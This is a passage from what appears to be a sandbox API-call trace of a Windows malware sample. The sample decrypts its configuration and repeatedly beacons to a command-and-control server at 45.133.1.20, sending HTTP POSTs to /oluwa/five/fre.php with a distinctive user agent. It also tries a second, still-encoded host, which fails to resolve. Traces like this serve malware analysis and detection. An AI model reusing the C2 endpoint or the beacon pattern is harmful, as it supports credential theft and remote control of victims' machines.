hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0208.460] GetProcessHeap () returned 0x6a0000 [0208.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0208.461] GetProcessHeap () returned 0x6a0000 [0208.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0208.461] GetProcessHeap () returned 0x6a0000 [0208.461] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0208.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.463] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.472] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0208.480] GetProcessHeap () returned 0x6a0000 [0208.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0208.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.481] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0208.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.483] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.484] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.484] GetProcessHeap () returned 0x6a0000 [0208.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0208.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.489] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0208.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.490] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0208.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.491] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0208.491] GetProcessHeap () returned 0x6a0000 [0208.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0208.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.492] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0208.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.494] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0208.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.495] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0208.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.499] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0208.499] GetProcessHeap () returned 0x6a0000 [0208.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0208.499] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0208.500] GetProcessHeap () returned 0x6a0000 [0208.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0208.500] socket (af=2, type=1, protocol=6) returned 0x59c [0208.500] connect (s=0x59c, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0208.525] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0208.525] GetProcessHeap () returned 0x6a0000 [0208.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0208.526] GetProcessHeap () returned 0x6a0000 [0208.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0208.527] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0208.528] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0208.528] GetProcessHeap () returned 0x6a0000 [0208.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0208.528] GetProcessHeap () returned 0x6a0000 [0208.529] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0208.529] GetProcessHeap () returned 0x6a0000 [0208.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0208.529] GetProcessHeap () returned 0x6a0000 [0208.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0208.531] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0208.532] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0208.532] GetProcessHeap () returned 0x6a0000 [0208.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0208.532] GetProcessHeap () returned 0x6a0000 [0208.533] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0208.533] send (s=0x59c, buf=0x6bd460*, len=242, flags=0) returned 242 [0208.533] send (s=0x59c, buf=0x6bb998*, len=159, flags=0) returned 159 [0208.534] GetProcessHeap () returned 0x6a0000 [0208.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0208.534] recv (in: s=0x59c, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0208.802] GetProcessHeap () returned 0x6a0000 [0208.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0208.803] GetProcessHeap () returned 0x6a0000 [0208.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0208.803] GetProcessHeap () returned 0x6a0000 [0208.803] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0208.804] GetProcessHeap () returned 0x6a0000 [0208.804] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0208.804] closesocket (s=0x59c) returned 0 [0208.806] GetProcessHeap () returned 0x6a0000 [0208.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9d0 | out: hHeap=0x6a0000) returned 1 [0208.806] GetProcessHeap () returned 0x6a0000 [0208.806] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0208.806] GetProcessHeap () returned 0x6a0000 [0208.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0208.807] GetProcessHeap () returned 0x6a0000 [0208.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0208.809] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x6bc) returned 0x59c [0208.812] Sleep (dwMilliseconds=0xea60) [0208.814] GetProcessHeap () returned 0x6a0000 [0208.814] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0208.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.816] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.824] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0208.877] GetProcessHeap () returned 0x6a0000 [0208.878] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0208.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.879] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0208.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.880] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.881] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.881] GetProcessHeap () returned 0x6a0000 [0208.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0208.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.883] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0208.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.885] CryptDestroyKey (hKey=0x6ad020) returned 1 [0208.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.886] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0208.886] GetProcessHeap () returned 0x6a0000 [0208.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0208.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.891] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0208.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.892] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0208.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.894] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0208.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.895] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0208.895] GetProcessHeap () returned 0x6a0000 [0208.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0208.895] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0208.895] GetProcessHeap () returned 0x6a0000 [0208.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0208.896] GetProcessHeap () returned 0x6a0000 [0208.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0208.896] GetProcessHeap () returned 0x6a0000 [0208.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0208.896] GetProcessHeap () returned 0x6a0000 [0208.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0208.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.898] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.906] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0208.913] GetProcessHeap () returned 0x6a0000 [0208.913] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0208.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.914] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0208.915] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.915] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.916] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.916] GetProcessHeap () returned 0x6a0000 [0208.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0208.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.918] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0208.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.920] CryptDestroyKey (hKey=0x6ad020) returned 1 [0208.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0208.921] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0208.921] GetProcessHeap () returned 0x6a0000 [0208.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0208.922] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.923] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0208.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.924] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0208.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.925] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0208.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0208.926] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0208.926] GetProcessHeap () returned 0x6a0000 [0208.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0208.926] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0208.926] GetProcessHeap () returned 0x6a0000 [0208.926] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0208.926] socket (af=2, type=1, protocol=6) returned 0x5a0 [0208.927] connect (s=0x5a0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0208.952] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0208.952] GetProcessHeap () returned 0x6a0000 [0208.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0208.952] GetProcessHeap () returned 0x6a0000 [0208.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c7f00 [0208.953] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0208.954] wvsprintfA (in: param_1=0x6c7f00, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0208.954] GetProcessHeap () returned 0x6a0000 [0208.954] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c9f28 [0208.954] GetProcessHeap () returned 0x6a0000 [0208.954] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0208.955] GetProcessHeap () returned 0x6a0000 [0208.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0208.955] GetProcessHeap () returned 0x6a0000 [0208.955] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c7f00 [0208.955] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0208.956] wvsprintfA (in: param_1=0x6c7f00, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0208.956] GetProcessHeap () returned 0x6a0000 [0208.956] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0208.956] GetProcessHeap () returned 0x6a0000 [0208.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7f00 | out: hHeap=0x6a0000) returned 1 [0208.957] send (s=0x5a0, buf=0x6bd460*, len=242, flags=0) returned 242 [0208.957] send (s=0x5a0, buf=0x6bb998*, len=159, flags=0) returned 159 [0208.957] GetProcessHeap () returned 0x6a0000 [0208.957] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0208.958] recv (in: s=0x5a0, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0209.043] GetProcessHeap () returned 0x6a0000 [0209.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0209.044] GetProcessHeap () returned 0x6a0000 [0209.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0209.045] GetProcessHeap () returned 0x6a0000 [0209.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c9f28 | out: hHeap=0x6a0000) returned 1 [0209.045] GetProcessHeap () returned 0x6a0000 [0209.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0209.045] closesocket (s=0x5a0) returned 0 [0209.046] GetProcessHeap () returned 0x6a0000 [0209.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0209.046] GetProcessHeap () returned 0x6a0000 [0209.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0209.047] GetProcessHeap () returned 0x6a0000 [0209.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0209.047] GetProcessHeap () returned 0x6a0000 [0209.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0209.047] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x67c) returned 0x5a0 [0209.049] Sleep (dwMilliseconds=0xea60) [0209.051] GetProcessHeap () returned 0x6a0000 [0209.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0209.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.054] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.069] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0209.091] GetProcessHeap () returned 0x6a0000 [0209.091] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0209.091] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.092] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0209.093] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.093] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0209.094] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.094] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0209.094] GetProcessHeap () returned 0x6a0000 [0209.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0209.095] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.096] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0209.097] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.097] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0209.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.098] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0209.098] GetProcessHeap () returned 0x6a0000 [0209.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0209.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.100] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0209.101] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.115] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0209.130] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.131] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0209.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0209.133] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0209.133] GetProcessHeap () returned 0x6a0000 [0209.133] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0209.133] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0209.133] GetProcessHeap () returned 0x6a0000 [0209.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0209.134] GetProcessHeap () returned 0x6a0000 [0209.134] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0209.135] GetProcessHeap () returned 0x6a0000 [0209.135] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0209.135] GetProcessHeap () returned 0x6a0000 [0209.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0209.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.136] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0209.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0209.143] 